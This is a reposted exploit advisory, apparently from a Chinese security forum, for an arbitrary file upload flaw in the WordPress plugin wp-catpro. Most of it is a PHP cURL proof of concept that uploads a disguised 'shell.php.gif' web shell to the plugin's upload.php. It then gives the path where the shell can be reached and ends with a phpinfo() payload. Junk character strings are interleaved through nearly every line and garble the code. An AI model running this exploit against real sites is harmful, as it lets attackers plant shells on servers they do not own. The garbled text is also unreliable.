WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
$ N5 I& c( K( U#-----------------------------------------------------------------------

' X) B0 j+ A' U0 |" ?8 c/ Y$ r$ D作者  => Zikou-16
1 ]" v) a6 Q2 L邮箱 => zikou16x@gmail.com
( K# G; H  A& ~! A* u# w7 ^测试系统 : Windows 7 , Backtrack 5r3
# @; Q0 P) J' y' q# N& d+ C下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
# s4 i2 J! p' G' N# G9 C  w
#=> Exploit 信息:
# r! q* P& U' y2 T) i7 @) C------------------
) I( k9 y/ U/ o% O/ m1 z: G# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
9 x0 Y$ L' V: ~4 H# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
6 `" K0 ?, N0 m7 P# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
1 r  k! c; M! c, ^------------------

5 ?; R3 @" f* E0 W3 I3 }8 D2 S#=> Exploit
4 }; {, ?* w, }+ v3 i-----------
<?php

& @9 Y$ j* ~3 F3 Z" P3 R- b& ?$uploadfile="zik.php.gif";
8 h" ^7 l' V8 [$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
, o, s2 t! i/ z& x$ \4 ?& A: D- varray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
# V6 T2 S- f( q+ jcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
9 }% F' F7 |7 `* G( R$postResult = curl_exec($ch);
! y7 v- E0 e) u  b5 z% O' }7 ~" ocurl_close($ch);

print "$postResult";
7 B- O, }$ y/ }, W. ?4 Z% U
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
* B4 H6 a/ N5 H( N; s- t?>